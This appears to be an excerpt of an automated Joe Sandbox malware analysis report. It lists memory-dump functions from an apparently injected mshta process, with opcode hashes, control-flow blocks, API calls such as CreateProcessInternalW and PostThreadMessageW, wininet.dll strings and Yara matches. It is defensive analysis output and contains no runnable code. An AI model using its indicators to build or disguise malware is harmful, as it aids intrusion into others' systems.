                                                                                                                                    • Opcode ID: 4f8dd333af239ddbe655abdeb0b24d8cf1ac94e725b3dfdca024e2eaa850a1c3
                                                                                                                                    • Instruction ID: 1cf55b0140deb50a98230dafd3849b31f9b79cfc115b0419c66aa325c7b59c2c
                                                                                                                                    • Opcode Fuzzy Hash: 4f8dd333af239ddbe655abdeb0b24d8cf1ac94e725b3dfdca024e2eaa850a1c3
                                                                                                                                    • Instruction Fuzzy Hash: A0900221606504426540B16C88489064049ABE2211755C126A099C550D865A89655669
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 5aade7811d3fcf8a2f1a00a43ec35968a5a6cb628188a4d63ff1b77f73023d90
                                                                                                                                    • Instruction ID: 2e1178c19869f10a0340180dc576a932cf40de46ef36abfa2b5e3de9c647c2d1
                                                                                                                                    • Opcode Fuzzy Hash: 5aade7811d3fcf8a2f1a00a43ec35968a5a6cb628188a4d63ff1b77f73023d90
                                                                                                                                    • Instruction Fuzzy Hash: 6A900221216D0442F600B56C4C18B07004987D1303F55C11AA0158554CCA1689615525
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 21ba2387548e200f13ed319bf96913448de9c4644a82371d769c459d27d01aab
                                                                                                                                    • Instruction ID: 43a549ab30810405dbddb0f6c815f5ae237f729f0efa91170abda40d3810c626
                                                                                                                                    • Opcode Fuzzy Hash: 21ba2387548e200f13ed319bf96913448de9c4644a82371d769c459d27d01aab
                                                                                                                                    • Instruction Fuzzy Hash: D190026134650842F500B15C4418B060049C7E2301F55C01AE1068554D871ACD52612A
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 3586c74f389ac15e09c1e7000b7a44356cef37f41cf2fdcf83c1803187d44993
                                                                                                                                    • Instruction ID: fc40538c8b17db2ae398e2b0d9e3c8b63dbb0bc63257d2dcc46afee92bee652d
                                                                                                                                    • Opcode Fuzzy Hash: 3586c74f389ac15e09c1e7000b7a44356cef37f41cf2fdcf83c1803187d44993
                                                                                                                                    • Instruction Fuzzy Hash: 5B90022160650902F501B15C4408616004E87D1241F95C027A1028555ECB268A92A135
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2701f2f9b535db312d0e24d9555f2508ae1643f4bde73753cb9d25e3bf5cccdb
                                                                                                                                    • Instruction ID: 23519ac9a6da5b5d6506b44a28f9acdd63d9901d11862358d7a1579ee6f1a5b5
                                                                                                                                    • Opcode Fuzzy Hash: 2701f2f9b535db312d0e24d9555f2508ae1643f4bde73753cb9d25e3bf5cccdb
                                                                                                                                    • Instruction Fuzzy Hash: E290026120690803F540B55C4808607004987D1302F55C016A2068555E8B2A8D516139
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 20cb2f6b5abc9c81d8d469bab93f1eb936ca865efe1939f5e065d69a4eff05ca
                                                                                                                                    • Instruction ID: 309b1870173b22804b1dfa8ab285bf0b1cf78c4bdc0c499b90ef386d7f5c948f
                                                                                                                                    • Opcode Fuzzy Hash: 20cb2f6b5abc9c81d8d469bab93f1eb936ca865efe1939f5e065d69a4eff05ca
                                                                                                                                    • Instruction Fuzzy Hash: 55900221247545527945F15C4408507404A97E1241795C017A1418950C86279956D625
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 452916c20ae9be8ca1936934a4354b9e15becaa69a9e9591b14915982853d2f0
                                                                                                                                    • Instruction ID: 6bba30e8b226f8b8f58c030687ee52328aceabeb466fc644bba0f8b14c3bbc2d
                                                                                                                                    • Opcode Fuzzy Hash: 452916c20ae9be8ca1936934a4354b9e15becaa69a9e9591b14915982853d2f0
                                                                                                                                    • Instruction Fuzzy Hash: AB90023120650813F511B15C4508707004D87D1241F95C417A0428558D97578A52A125
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: a7010abd95f9b3c489fde41e8462331f9d28267c25f9fdb62c0c65756c7a8d2b
                                                                                                                                    • Instruction ID: 88b8c7df0b3763ec5cc33d27d0414ac118f94a5c54466c1ee3546a553ec25246
                                                                                                                                    • Opcode Fuzzy Hash: a7010abd95f9b3c489fde41e8462331f9d28267c25f9fdb62c0c65756c7a8d2b
                                                                                                                                    • Instruction Fuzzy Hash: FB90022921750402F580B15C540C60A004987D2202F95D41AA0019558CCA1689695325
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2fa61ad8edc115a21573537c7ebf8918346da5edb96ae4c3bf1ff566d181cec5
                                                                                                                                    • Instruction ID: 1af2e4e6d3abf2172e97aa8261ce7e2956c15c54d417a571b94dcf72b00c6b72
                                                                                                                                    • Opcode Fuzzy Hash: 2fa61ad8edc115a21573537c7ebf8918346da5edb96ae4c3bf1ff566d181cec5
                                                                                                                                    • Instruction Fuzzy Hash: F390022130650403F540B15C541C6064049D7E2301F55D016E0418554CDA1689565226
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 68cb69f28210c73b40753755ed375ca208d48151d18637ccffafb2d075a7e4c4
                                                                                                                                    • Instruction ID: 7842fd8fdaf01630ef1612b1ea5de0d909ae31651898f629c7da392baecd2b44
                                                                                                                                    • Opcode Fuzzy Hash: 68cb69f28210c73b40753755ed375ca208d48151d18637ccffafb2d075a7e4c4
                                                                                                                                    • Instruction Fuzzy Hash: 4090023120650802F500B59C540C646004987E1301F55D016A5028555EC76689916135
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 53179d3e76bce495bb0befd7e4fb3e625c26b7dea838cad0e7ea8f8263ff7437
                                                                                                                                    • Instruction ID: 203f9c8f9bc7635fdfbb0c611244370dbcee7463a5516b41a9493590d876ec50
                                                                                                                                    • Opcode Fuzzy Hash: 53179d3e76bce495bb0befd7e4fb3e625c26b7dea838cad0e7ea8f8263ff7437
                                                                                                                                    • Instruction Fuzzy Hash: 2D90023120658C02F510B15C840874A004987D1301F59C416A4428658D879689917125
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: c9dc3f4bf707fabc54f0bdd97c2ffd6516bae11127e1204ad14faa8fa5fbf69e
                                                                                                                                    • Instruction ID: c579929095cab740b364adff23d14ad346d2b2707f8effd90d78f8327d79aebb
                                                                                                                                    • Opcode Fuzzy Hash: c9dc3f4bf707fabc54f0bdd97c2ffd6516bae11127e1204ad14faa8fa5fbf69e
                                                                                                                                    • Instruction Fuzzy Hash: 0390023120650C42F500B15C4408B46004987E1301F55C01BA0128654D8716C9517525
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 6074b6f643aedaea16aa9ac90fa3de6005a07db30e0c3b8275cc373442f0c0a5
                                                                                                                                    • Instruction ID: f4e6c41e1352c4a6984e5eb68dfc8b15e44cf54185fbd4ce6d17a47e60bca2ee
                                                                                                                                    • Opcode Fuzzy Hash: 6074b6f643aedaea16aa9ac90fa3de6005a07db30e0c3b8275cc373442f0c0a5
                                                                                                                                    • Instruction Fuzzy Hash: 5690023160A60802F500B15C4518706104987D1201F65C416A0428568D87968A5165A6
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: db9fa0974e7a29b715dca886e9b5ad94f29fe3fe07441e729cce83c280a73c81
                                                                                                                                    • Instruction ID: a36297a0107c8506a3a8a25226c01441dd6d40dbad37b4312bd55f5a1565c20d
                                                                                                                                    • Opcode Fuzzy Hash: db9fa0974e7a29b715dca886e9b5ad94f29fe3fe07441e729cce83c280a73c81
                                                                                                                                    • Instruction Fuzzy Hash: B390022124A55502F550B15C44086164049A7E1201F55C026A0818594D865689556225

                                                                                                                                    Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                                                    • Block 516: b90e3e-b90eae, calls bab6a0, bac0b0, b945e0, b81410, ba1d30; edges to blocks 528 and 529
                                                                                                                                    • Block 529: b90eb0-b90ec1, PostThreadMessageW; edges to blocks 528 and 530
                                                                                                                                    • Block 530: b90ec3-b90ecd; edge to block 528
                                                                                                                                    • Block 528: b90ed0-b90ed5; no outgoing edges listed
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00B90EBD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 1863I7301$1863I7301
                                                                                                                                    • API String ID: 1836367815-3745599348
                                                                                                                                    • Opcode ID: db745ec219eb3f97f798e0b6bec47fa0c10ae7db127345883e8482ea04918055
                                                                                                                                    • Instruction ID: 58b724f4147d201eabf3889f7152b8eed42b8690323e9b4c131ea8fd9799ca71
                                                                                                                                    • Opcode Fuzzy Hash: db745ec219eb3f97f798e0b6bec47fa0c10ae7db127345883e8482ea04918055
                                                                                                                                    • Instruction Fuzzy Hash: 2001DB71D4121876DB11A6D48C02FDF7BBC9F41B50F048495FA047B281D7B466068BE6

                                                                                                                                    Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                                                                                                    • Block 531: b90e40-b90eae, calls bab6a0, bac0b0, b945e0, b81410, ba1d30; edges to blocks 542 and 543
                                                                                                                                    • Block 543: b90eb0-b90ec1, PostThreadMessageW; edges to blocks 542 and 544
                                                                                                                                    • Block 544: b90ec3-b90ecd; edge to block 542
                                                                                                                                    • Block 542: b90ed0-b90ed5; no outgoing edges listed
                                                                                                                                    APIs
                                                                                                                                    • PostThreadMessageW.USER32(1863I7301,00000111,00000000,00000000), ref: 00B90EBD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                    • String ID: 1863I7301$1863I7301
                                                                                                                                    • API String ID: 1836367815-3745599348
                                                                                                                                    • Opcode ID: 001725b3b93487e4ade9a6ec4ea4c7a4866323755139e95977e0f61fb8a6713a
                                                                                                                                    • Instruction ID: ecfcc8a470879250639cb40e5a22e3163a7d5f9457ecb5a13b0ce8c9dff80799
                                                                                                                                    • Opcode Fuzzy Hash: 001725b3b93487e4ade9a6ec4ea4c7a4866323755139e95977e0f61fb8a6713a
                                                                                                                                    • Instruction Fuzzy Hash: 5C01D671D402187AEB21AAD08C02FDF7BBC9F41B50F0484A5FA047B281D6B46A068BE6
APIs
• Sleep.KERNELBASE(000007D0), ref: 00BA3CBB
Strings
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: InitializeUninitialize
• String ID: @J7<
• API String ID: 3442037557-2016760708
APIs
• GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 00B9846C
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00B94652
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
• CreateProcessInternalW.KERNELBASE(?,?,?,?,00B983FE,00000010,?,?,?,00000044,?,00000010,00B983FE,?,?,?), ref: 00BA9983
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00B89B95
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00B89B95
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• RtlFreeHeap.NTDLL(00000000,00000004,00000000,C4830C75,00000007,00000000,00000004,00000000,00B93E6C,000000F4), ref: 00BA98CF
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
APIs
• RtlAllocateHeap.NTDLL(00B91AD9,?,00BA5AD7,00B91AD9,00BA57DF,00BA5AD7,?,00B91AD9,00BA57DF,00001000,?,?,00000000), ref: 00BA987F
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
• GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 00B9846C
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• SetErrorMode.KERNELBASE(00008003,?,?,00B91DE0,00BA811F,00BA57DF,00B91DA3), ref: 00B98263
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0

APIs
• SetErrorMode.KERNELBASE(00008003,?,?,00B91DE0,00BA811F,00BA57DF,00B91DA3), ref: 00B98263
Memory Dump Source
• Source File: 00000009.00000002.4143227652.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Offset: 00B80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_b80000_mshta.jbxd
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: a90eefdab6c3186fc3f21299829f79aa8092fd2369db515f455c14661992b685
• Instruction ID: e01d397a002806d433da27093762824dbe569df6b08cd6481a47310dd3356083
• Opcode Fuzzy Hash: a90eefdab6c3186fc3f21299829f79aa8092fd2369db515f455c14661992b685
• Instruction Fuzzy Hash: 79D05E716842003BEA40B7E4DC07F9636CC9B05754F0448B4FA0CDB2C3ED55E50146A5

Memory Dump Source
• Source File: 00000009.00000002.4144475122.0000000003910000.00000040.00001000.00020000.00000000.sdmp, Offset: 03910000, based on PE: true
• Associated: 00000009.00000002.4144475122.0000000003A39000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003A3D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4144475122.0000000003AAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3910000_mshta.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: cddc98279e7d6be6fb79732af04c80194942380641e032b2aeb83889668b0424
• Instruction ID: 8281bc1d75c40a35ecb9586cb4f4c817085a761a3472f5c7f5a406ca62ef9a70
• Opcode Fuzzy Hash: cddc98279e7d6be6fb79732af04c80194942380641e032b2aeb83889668b0424
• Instruction Fuzzy Hash: 70B09B719065C5C5FE11F764460C717794867D1741F19C4A6D2434645E4739C1D1E175

Memory Dump Source
• Source File: 00000009.00000002.4144343498.0000000003760000.00000040.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3760000_mshta.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4841fbc7001f98443dc590d71886d6ab41d49b6bdb3c4b17ea997b6cc1d5ef84
• Instruction ID: 73feb6556d092a0dc8a944519075cf48f8cd70b720da412aca2d93b07a2d9245
• Opcode Fuzzy Hash: 4841fbc7001f98443dc590d71886d6ab41d49b6bdb3c4b17ea997b6cc1d5ef84
• Instruction Fuzzy Hash: 1441E274A1CF0D4FD768EF6890A1676B3E2FB89300F50052DC88AC3652EB70E8468785

Memory Dump Source
• Source File: 00000009.00000002.4144343498.0000000003760000.00000040.00000800.00020000.00000000.sdmp, Offset: 03760000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3760000_mshta.jbxd
Similarity
• API ID:
• String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
• API String ID: 0-3558027158
